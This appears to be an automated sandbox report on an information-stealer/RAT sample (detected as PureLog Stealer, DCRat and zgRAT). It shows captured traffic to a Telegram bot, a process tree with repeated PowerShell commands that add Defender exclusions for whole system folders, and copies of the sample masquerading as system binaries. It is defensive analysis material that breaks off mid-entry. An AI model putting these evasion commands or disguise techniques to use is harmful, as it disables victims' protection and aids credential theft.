                                                                                                Data Ascii: s]d>iSJ)qpUZAjOGB"Q_8RRPIZ(PhZCLaIKE%bQKJNQ((HhqE-JJZ(QE%(4RP1(b@Z(1IKEh4))i)RbRP1(Z((bQP1(-!bHiIJE&8bf:PPH(
                                                                                                2024-10-11 18:37:14 UTC4096OUTData Raw: 41 70 6d a3 82 6b 5b 88 a4 2d 98 d1 50 18 ca a9 52 18 28 3f 31 5c 1c f6 e6 b4 7c 98 b3 9f 2d 33 fe e8 a0 c3 19 eb 1a 9f f8 0d 6b 4f 2c 54 ed 69 6d fe 56 30 ab 9b ba ad f3 43 75 67 f7 df f3 31 2f e5 5b 9f 0d 43 67 01 93 fb 52 4f 2e de 65 28 76 88 21 76 74 39 ef 9d c8 b8 ff 00 a6 43 da ac cd 26 9f 0e a7 a8 eb d1 5d 07 b9 b9 13 cb 1d 97 94 e6 64 9a 54 65 2a e4 ae cd 8a 59 8e 43 12 40 1c 02 4e 34 82 20 39 0a b9 f5 c5 1e 5c 79 ce c5 cf ae 2a 5e 55 07 76 a5 bd ff 00 1d ca 59 d5 4d 13 8a d2 df 86 c6 7d 9d dd 8d bc 16 f0 4b aa 28 2b e4 2b b1 b6 73 b7 70 fd e1 f7 d9 d3 fd ae d5 76 19 44 c8 5d 48 2b 92 01 03 19 1e b4 a6 08 89 c9 8d 3f ef 91 4e 00 01 80 00 1e d5 df 4a 94 e0 fd e9 5d 1e 7d 7a d4 ea 2f 76 16 62 d2 52 d2 56 e7 30 52 52 d1 40 09 45 06 8a 06 25 14 51 8a
                                                                                                Data Ascii: Apmk[-PR(?1\|-3kO,TimV0Cug1/[CgRO.e(v!vt9C&]dTe*YC@N4 9\y*^UvYM}K(++spvD]H+?NJ]}z/vbRV0RR@E%Q
                                                                                                2024-10-11 18:37:14 UTC4096OUTData Raw: 65 04 13 ec 48 1f 4f a5 53 f1 bf fc 8d b7 7f ee c7 ff 00 a0 2d 6a 78 5f c0 3a b6 8b e2 3b 4d 46 ea e2 cd e2 87 7e e1 1b b9 6e 50 a8 c6 54 7a 8e f5 97 e3 7f f9 1b 6f 3e 91 ff 00 e8 0b 5c b4 5d 29 63 93 a4 ee ac fe fd 4d 31 8a ac 72 e6 aa ab 3e 65 f7 68 73 d4 94 b4 57 b4 7c d0 94 52 d2 53 03 53 c3 7f f2 32 e9 bf f5 f0 9f ce bb db 09 05 9f c4 bd 5a 19 be 56 be b6 8a 58 09 fe 20 8b b4 8f af 07 f2 ae 0b c3 9f f2 32 e9 bf f5 f2 9f ce bd 43 c4 3e 1f 8f 5c 82 26 49 9a da fa dd b7 db dc a7 54 3f d4 1a f0 33 29 c5 62 79 65 b4 a3 6f c6 ff 00 a1 f5 39 34 64 f0 bc d1 de 32 bf e0 97 ea 72 1a ce 8d ad 69 de 24 d5 2f 2d 34 88 b5 38 35 18 ca ab 38 0c 62 24 73 c7 6f ff 00 55 6e e8 b6 8f e1 4f 01 c8 35 16 55 78 a3 92 57 50 7e e9 3d 17 3e bd 07 d4 d3 52 ff 00 c6 b6 6b e4 cf
                                                                                                Data Ascii: eHOS-jx_:;MF~nPTzo>\])cM1r>ehsW|RSS2ZVX 2C>\&IT?3)byeo94d2ri$/-4858b$soUnO5UxWP~=>Rk
                                                                                                2024-10-11 18:37:14 UTC1580INHTTP/1.1 200 OK
                                                                                                Server: nginx/1.18.0
                                                                                                Date: Fri, 11 Oct 2024 18:37:14 GMT
                                                                                                Content-Type: application/json
                                                                                                Content-Length: 1191
                                                                                                Connection: close
                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                {"ok":true,"result":{"message_id":161,"from":{"id":7829111840,"is_bot":true,"first_name":"sosososoossososofdksjg_bot","username":"kdafjkdajgkfsjgsfjlkjgs_bot"},"chat":{"id":6951385386,"first_name":".","username":"a_123412","type":"private"},"date":1728671834,"photo":[{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAANzAAM2BA","file_unique_id":"AQAD2-kxGzoJUEh4","file_size":1106,"width":90,"height":72},{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAANtAAM2BA","file_unique_id":"AQAD2-kxGzoJUEhy","file_size":14154,"width":320,"height":256},{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAAN4AAM2BA","file_unique_id":"AQAD2-kxGzoJUEh9","file_size":58008,"width":800,"height":640},{"file_id":"AgACAgIAAxkDAAOhZwlwWhzN-pJ29OocxFVaemei68cAAtvpMRs6CVBITBq4MNEkZgIBAAMCAAN5AAM2BA","file_unique_id":"AQAD2-kxGzoJUEh-","file_size":85601,"width":1280,"height":1024}],"caption":"new user connect !\nID: cb9f04f525f9e1298 [TRUNCATED]


                                                                                                Statistics

                                                                                                CPU Usage

                                                                                                Click to jump to process

                                                                                                Memory Usage

                                                                                                Click to jump to process

                                                                                                High Level Behavior Distribution

                                                                                                Click to dive into process behavior distribution

                                                                                                Behavior

                                                                                                Click to jump to process

                                                                                                System Behavior

                                                                                                General

                                                                                                Target ID:0
                                                                                                Start time:14:36:59
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe"
                                                                                                Imagebase:0x450000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.2059603887.0000000000452000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2249326052.0000000012B40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:2
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:4
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:7
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:8
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:13
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:14
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:15
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:16
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:17
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:18
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:19
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:20
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:21
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:22
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:23
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                Imagebase:0x7ff7be880000
                                                                                                File size:452'608 bytes
                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:24
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:25
                                                                                                Start time:14:37:02
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:36
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                                                                Imagebase:0xc50000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:37
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                                                                Imagebase:0xf90000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:41
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Imagebase:0x150000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\Downloads\smartscreen.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:42
                                                                                                Start time:14:37:07
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Users\user\Downloads\smartscreen.exe
                                                                                                Imagebase:0xa80000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:44
                                                                                                Start time:14:37:08
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Recovery\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\WmiPrvSE.exe
                                                                                                Imagebase:0xfd0000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WmiPrvSE.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:46
                                                                                                Start time:14:37:08
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Recovery\WmiPrvSE.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Recovery\WmiPrvSE.exe
                                                                                                Imagebase:0x5d0000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:47
                                                                                                Start time:14:37:15
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
                                                                                                Imagebase:0x7ff69b960000
                                                                                                File size:289'792 bytes
                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:49
                                                                                                Start time:14:37:15
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:51
                                                                                                Start time:14:37:16
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:chcp 65001
                                                                                                Imagebase:0x7ff762fd0000
                                                                                                File size:14'848 bytes
                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:52
                                                                                                Start time:14:37:18
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                Imagebase:0x7ff7bbfe0000
                                                                                                File size:108'032 bytes
                                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:53
                                                                                                Start time:14:37:23
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:"C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                                                                                                Imagebase:0xbb0000
                                                                                                File size:2'335'232 bytes
                                                                                                MD5 hash:670861D1059F9BAF2A8525097157D1C2
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Avira
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 88%, ReversingLabs
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:55
                                                                                                Start time:14:37:25
                                                                                                Start date:11/10/2024
                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
